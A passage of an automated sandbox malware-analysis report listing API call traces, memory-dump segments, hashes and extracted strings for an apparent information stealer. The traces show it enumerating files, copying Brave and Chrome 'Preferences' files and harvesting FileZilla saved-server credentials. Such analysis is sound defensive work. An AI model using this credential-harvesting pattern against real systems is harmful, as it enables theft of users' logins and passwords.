                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                          • String ID: \*.*
                          • API String ID: 4127656590-1173974218
                          • Opcode ID: 07539751e9183458e7e904b7b1cdd54a7ae6ea3ceda46875d0fe63be724a2d43
                          • Instruction ID: 9c2161926dfd35d7bc17b86db96affca19e3514023847a9b34dd6fb9fcf152ad
                          • Opcode Fuzzy Hash: 07539751e9183458e7e904b7b1cdd54a7ae6ea3ceda46875d0fe63be724a2d43
                          • Instruction Fuzzy Hash: 8D926571A112169BCB33EFA8DD88AAF77B9EF56700F05412AF805AB251DB34DD05CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ADBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADBEF
                          • lstrlen.KERNEL32(003D4CA8), ref: 003ADBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADC17
                          • lstrcat.KERNEL32(00000000,003D4CA8), ref: 003ADC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADC4C
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ADC8F
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ADCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003ADCD0
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003ADCF0
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003ADD0A
                          • lstrlen.KERNEL32(003CCFEC), ref: 003ADD1D
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ADD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADD7B
                          • lstrlen.KERNEL32(003D1794), ref: 003ADD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADDA3
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003ADDAF
                          • lstrlen.KERNEL32(?), ref: 003ADDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 003ADDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADE19
                          • lstrlen.KERNEL32(003D1794), ref: 003ADE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 003ADE6F
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003ADE7B
                          • lstrlen.KERNEL32(00F29408), ref: 003ADE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADEBB
                          • lstrlen.KERNEL32(003D1794), ref: 003ADEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 003ADEE6
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003ADEF2
                          • lstrlen.KERNEL32(00F290F8), ref: 003ADF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADFA5
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003ADFB1
                          • lstrlen.KERNEL32(00F29408), ref: 003ADFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADFF4
                          • lstrlen.KERNEL32(003D1794), ref: 003ADFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE022
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003AE02E
                          • lstrlen.KERNEL32(00F290F8), ref: 003AE03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003AE06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 003AE0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 003AE0E7
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003AE11F
                          • lstrlen.KERNEL32(00F2D6C0), ref: 003AE12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE155
                          • lstrcat.KERNEL32(00000000,?), ref: 003AE15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE19F
                          • lstrcat.KERNEL32(00000000), ref: 003AE1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 003AE1F9
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003AE22F
                          • lstrlen.KERNEL32(00F290B8), ref: 003AE23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE261
                          • lstrcat.KERNEL32(00000000,00F290B8), ref: 003AE269
                          • lstrlen.KERNEL32(\Brave\Preferences), ref: 003AE274
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE29B
                          • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 003AE2A7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE2CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE30F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE349
                          • DeleteFileA.KERNEL32(?), ref: 003AE381
                          • StrCmpCA.SHLWAPI(?,00F2D720), ref: 003AE3AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE3F4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE41C
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE445
                          • StrCmpCA.SHLWAPI(?,00F290F8), ref: 003AE468
                          • StrCmpCA.SHLWAPI(?,00F29408), ref: 003AE47D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE4D9
                          • GetFileAttributesA.KERNEL32(00000000), ref: 003AE4E0
                          • StrCmpCA.SHLWAPI(?,00F2D738), ref: 003AE58E
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003AE5C4
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 003AE639
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE678
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE6A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE6C7
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE70E
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE737
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE75C
                          • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 003AE776
                          • DeleteFileA.KERNEL32(?), ref: 003AE7D2
                          • StrCmpCA.SHLWAPI(?,00F29238), ref: 003AE7FC
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE88C
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE8B5
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE8EE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE916
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE952
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 2635522530-726946144
                          • Opcode ID: 226bd6821e70c9657015f19a05eae685b7672eb63e696ea69b6693bb2df57440
                          • Instruction ID: a2842361c97d2b94a7132114974c4310d2f6617600abba8d887180317136ca29
                          • Opcode Fuzzy Hash: 226bd6821e70c9657015f19a05eae685b7672eb63e696ea69b6693bb2df57440
                          • Instruction Fuzzy Hash: 0692A071A112169BCB22EFB8DC89AAF77B9EF56300F05452AF806DB251DB34DC45CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B18D2
                          • lstrlen.KERNEL32(\*.*), ref: 003B18DD
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B18FF
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 003B190B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1932
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003B1947
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003B1967
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003B1981
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B19BF
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B19F2
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B1A1A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B1A25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1A4C
                          • lstrlen.KERNEL32(003D1794), ref: 003B1A5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1A80
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B1A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1AB4
                          • lstrlen.KERNEL32(?), ref: 003B1AC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1AE5
                          • lstrcat.KERNEL32(00000000,?), ref: 003B1AF3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1B19
                          • lstrlen.KERNEL32(00F29248), ref: 003B1B2F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1B59
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B1B64
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1B8F
                          • lstrlen.KERNEL32(003D1794), ref: 003B1BA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1BC3
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B1BCF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1BF8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1C25
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B1C30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1C57
                          • lstrlen.KERNEL32(003D1794), ref: 003B1C69
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1C8B
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B1C97
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1CC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1CEF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B1CFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1D21
                          • lstrlen.KERNEL32(003D1794), ref: 003B1D33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1D55
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B1D61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1D8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1DB9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B1DC4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1DED
                          • lstrlen.KERNEL32(003D1794), ref: 003B1E19
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1E36
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B1E42
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1E68
                          • lstrlen.KERNEL32(00F2D828), ref: 003B1E7E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1EB2
                          • lstrlen.KERNEL32(003D1794), ref: 003B1EC6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1EE3
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B1EEF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1F15
                          • lstrlen.KERNEL32(00F2DA60), ref: 003B1F2B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1F5F
                          • lstrlen.KERNEL32(003D1794), ref: 003B1F73
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1F90
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B1F9C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1FC2
                          • lstrlen.KERNEL32(00F1A5D0), ref: 003B1FD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B2000
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B200B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B2036
                          • lstrlen.KERNEL32(003D1794), ref: 003B2048
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B2067
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B2073
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B2098
                          • lstrlen.KERNEL32(?), ref: 003B20AC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B20D0
                          • lstrcat.KERNEL32(00000000,?), ref: 003B20DE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B2103
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B213F
                          • lstrlen.KERNEL32(00F2D6C0), ref: 003B214E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B2176
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B2181
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                          • String ID: \*.*
                          • API String ID: 712834838-1173974218
                          • Opcode ID: 9cdab0b23963e2a8fd052231b04490e0a10faf7a2c23f7ec8cddf118e912ac8e
                          • Instruction ID: 5de9644e7d411cb8d4497d11014dffc0727453a90077c2d89030d604eeacd935
                          • Opcode Fuzzy Hash: 9cdab0b23963e2a8fd052231b04490e0a10faf7a2c23f7ec8cddf118e912ac8e
                          • Instruction Fuzzy Hash: A5629E31A12216ABCB23AF68DC48AEF77B9EF51704F45012AF9059BA61DB34DD05CB90
                          APIs
                          • wsprintfA.USER32 ref: 003B392C
                          • FindFirstFileA.KERNEL32(?,?), ref: 003B3943
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003B396C
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003B3986
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B39BF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B39E7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B39F2
                          • lstrlen.KERNEL32(003D1794), ref: 003B39FD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3A1A
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B3A26
                          • lstrlen.KERNEL32(?), ref: 003B3A33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3A53
                          • lstrcat.KERNEL32(00000000,?), ref: 003B3A61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3A8A
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B3ACE
                          • lstrlen.KERNEL32(?), ref: 003B3AD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3B05
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B3B10
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3B36
                          • lstrlen.KERNEL32(003D1794), ref: 003B3B48
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3B6A
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B3B76
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3B9E
                          • lstrlen.KERNEL32(?), ref: 003B3BB2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3BD2
                          • lstrcat.KERNEL32(00000000,?), ref: 003B3BE0
                          • lstrlen.KERNEL32(00F290B8), ref: 003B3C0B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3C31
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B3C3C
                          • lstrlen.KERNEL32(00F29248), ref: 003B3C5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3C84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B3C8F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3CB7
                          • lstrlen.KERNEL32(003D1794), ref: 003B3CC9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3CE8
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B3CF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3D1A
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B3D47
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B3D52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3D79
                          • lstrlen.KERNEL32(003D1794), ref: 003B3D8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3DAD
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B3DB9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3DE2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3E11
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B3E1C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3E43
                          • lstrlen.KERNEL32(003D1794), ref: 003B3E55
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3E77
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B3E83
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3EAC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3EDB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B3EE6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3F0D
                          • lstrlen.KERNEL32(003D1794), ref: 003B3F1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3F41
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B3F4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3F75
                          • lstrlen.KERNEL32(?), ref: 003B3F89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3FA9
                          • lstrcat.KERNEL32(00000000,?), ref: 003B3FB7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3FE0
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B401F
                          • lstrlen.KERNEL32(00F2D6C0), ref: 003B402E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4056
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B4061
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B408A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B40CE
                          • lstrcat.KERNEL32(00000000), ref: 003B40DB
                          • FindNextFileA.KERNEL32(00000000,?), ref: 003B42D9
                          • FindClose.KERNEL32(00000000), ref: 003B42E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 1006159827-1013718255
                          • Opcode ID: 9d8e13bb1c9b7711cbf82d51e1add9c649576622350ce18f3827de004b8ede1b
                          • Instruction ID: 8b084c9dbfe7aaabc4ec0750140383fe23bc4a398d9805b6bfd61db91a82f3da
                          • Opcode Fuzzy Hash: 9d8e13bb1c9b7711cbf82d51e1add9c649576622350ce18f3827de004b8ede1b
                          • Instruction Fuzzy Hash: 5762C331A11626ABCB23EFA8DC48AEF77B9EF50704F05412AF905A7A51DB34DD05CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B6995
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003B69C8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6A29
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B6A34
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6A5D
                          • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 003B6A77
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6A99
                          • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 003B6AA5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6AD0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6B00
                          • LocalAlloc.KERNEL32(00000040,?), ref: 003B6B35
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B6B9D
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B6BCD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 313953988-555421843
                          • Opcode ID: 050be325989fbb58ee2b6d9d6af2e10fb405a7174560f5c257cdd01eb492f5b7
                          • Instruction ID: 084248fdf3c077fe03ae6873dff1e06e9401863bbfd4e7a5d196154182bf1849
                          • Opcode Fuzzy Hash: 050be325989fbb58ee2b6d9d6af2e10fb405a7174560f5c257cdd01eb492f5b7
                          • Instruction Fuzzy Hash: B442D030A11216ABCB23EBB8DC4AAAF7B79EF51704F05441AF905EB652DB34DD05CB60
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ADBC1
